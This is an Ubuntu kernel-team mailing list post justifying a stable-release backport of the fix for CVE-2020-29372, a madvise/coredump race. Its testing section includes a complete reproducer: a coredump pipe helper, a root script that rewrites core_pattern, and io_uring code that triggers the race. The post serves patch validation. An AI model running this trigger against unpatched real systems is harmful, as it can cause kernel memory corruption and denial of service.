[SRU][CVE-2020-29372][F/B/X][PATCH 0/1] mm: check that mm is still valid in madvise()
William Breathitt Gray
william.gray at canonical.com
Fri Jan 8 08:41:24 UTC 2021
SRU Justification
=================
[Impact]
An issue was discovered in do_madvise in mm/madvise.c in the Linux
kernel before 5.6.8. There is a race condition between coredump
operations and the IORING_OP_MADVISE implementation, aka
CID-bc0c4d1e176e.
[Testing]
Jann Horn from Google Security Research has provided a root-only KASAN
reproducer:
<https://packetstormsecurity.com/files/157622/Linux-5.6-IORING_OP_MADVISE-Race-Condition.html>.
You should also be able to hit the bug as a normal user, especially if
you use FUSE:
$ cat > coredump_helper.c
#include <unistd.h>
#include <stdlib.h>
#include <err.h>
#include <stdbool.h>
/*
 * Core-dump pipe helper: drains stdin in 1 KiB chunks and, once more than
 * 1 MiB has been consumed in total, pauses a single time for two seconds
 * before continuing to drain until EOF.
 *
 * NOTE(review): the pause presumably keeps the core dump in flight long
 * enough for the delayed madvise queued by dumpme to run -- confirm.
 *
 * Returns 0 on EOF; exits with status 1 via err() if read() fails.
 */
int main(void) {
    char buf[1024];
    size_t total = 0;
    bool slept = false;

    for (;;) {
        /* read() returns ssize_t; keep the full width instead of int. */
        ssize_t res = read(0, buf, sizeof(buf));
        if (res == -1)
            err(1, "read");
        if (res == 0)
            return 0;
        total += (size_t)res;
        if (total > 1024*1024 && !slept) {
            sleep(2);
            slept = true;
        }
    }
}
$ gcc -o coredump_helper coredump_helper.c
$ cat > set_helper.sh
#!/bin/sh
# Pipe core dumps to ./coredump_helper, resolved to an absolute path.
# The leading '|' must be the first character written to core_pattern,
# so the string is wrapped in plain (unescaped) double quotes.
echo "|$(realpath ./coredump_helper)" > /proc/sys/kernel/core_pattern
$ sudo ./set_helper.sh
$ cat > dumpme.c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <linux/io_uring.h>
/*
 * SYSCHK(x): evaluate x exactly once and yield its value. If the value
 * equals -1 converted to x's type (the failure sentinel of the mmap/syscall
 * calls it wraps here), report the failing expression via err() and exit
 * with status 1.
 *
 * Relies on GNU statement expressions. __typeof__ is spelled with
 * underscores so the macro also builds under strict -std=c99/-std=c11.
 */
#define SYSCHK(x) ({ \
    __typeof__(x) __res = (x); \
    if (__res == (__typeof__(x))-1) \
        err(1, "SYSCHK(" #x ")"); \
    __res; \
})
/*
 * Reproducer: queue a timeout-delayed IORING_OP_MADVISE through io_uring,
 * then crash on purpose so a core dump starts while that request is still
 * pending.
 *
 * Steps:
 *   1. Map and fill a 2 MiB anonymous region, and mark part of it
 *      MADV_RANDOM.
 *   2. Set up an io_uring and map its SQ ring, CQ ring and SQE array.
 *   3. Submit two SQEs: a 1-second IORING_OP_TIMEOUT flagged
 *      IOSQE_IO_HARDLINK, followed by an IORING_OP_MADVISE(MADV_NORMAL)
 *      on the mapped region.
 *   4. Write through a NULL pointer to raise SIGSEGV.
 *
 * Every syscall is wrapped in SYSCHK(), so a failure exits via err().
 */
int main(void) {
    void *area = SYSCHK(mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE|PROT_EXEC,
                             MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
    memset(area, 'O', 1024*1024*2);
    SYSCHK(madvise(area+0x1000, 256*0x1000, MADV_RANDOM));

    // initialize uring
    struct io_uring_params params = { };
    int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/10, &params));
    unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                         MAP_SHARED, uring_fd,
                                         IORING_OFF_SQ_RING));
    unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                         MAP_SHARED, uring_fd,
                                         IORING_OFF_CQ_RING));
    struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                            MAP_SHARED, uring_fd,
                                            IORING_OFF_SQES));

    // prepare delayed madvise via uring
    struct timespec ts = { .tv_sec = 1 };
    sqes[0] = (struct io_uring_sqe) {
        .opcode = IORING_OP_TIMEOUT,
        .flags = IOSQE_IO_HARDLINK,
        .len = 1,
        .addr = (unsigned long)&ts
    };
    sqes[1] = (struct io_uring_sqe) {
        // no ioprio, buf_index, off
        .opcode = IORING_OP_MADVISE,
        .addr = (unsigned long)area+1024*4/**1024*/,
        .len = 1024*1024,
        .fadvise_advice = MADV_NORMAL
    };

    // publish both SQEs: fill the index array, then advance the tail by 2
    ((int*)(sq_ring + params.sq_off.array))[0] = 0;
    ((int*)(sq_ring + params.sq_off.array))[1] = 1;
    (*(int*)(sq_ring + params.sq_off.tail)) += 2;

    int submitted = SYSCHK(syscall(__NR_io_uring_enter, uring_fd,
                                   /*to_submit=*/2, /*min_complete=*/0,
                                   /*flags=*/0, /*sig=*/NULL, /*sigsz=*/0));
    printf("submitted %d\n", submitted);

    // deliberate NULL write: triggers SIGSEGV and thus the core dump
    *(volatile char *)0 = 42;
}
$ gcc -o dumpme dumpme.c
$ ./dumpme
submitted 2
Segmentation fault (core dumped)
$
[Regression Potential]
Regression potential is low. Changes affect only the do_madvise()
function, and consist of a simple mitigation: verifying that the mm is
still okay via mmget_still_valid().
[Miscellaneous]
Fix is already present in Groovy and Hirsute.
Linus Torvalds (1):
mm: check that mm is still valid in madvise()
mm/madvise.c | 18 ++++++++++++++++++
1 file changed, 18 insertions(+)
--
2.27.0
More information about the kernel-team
mailing list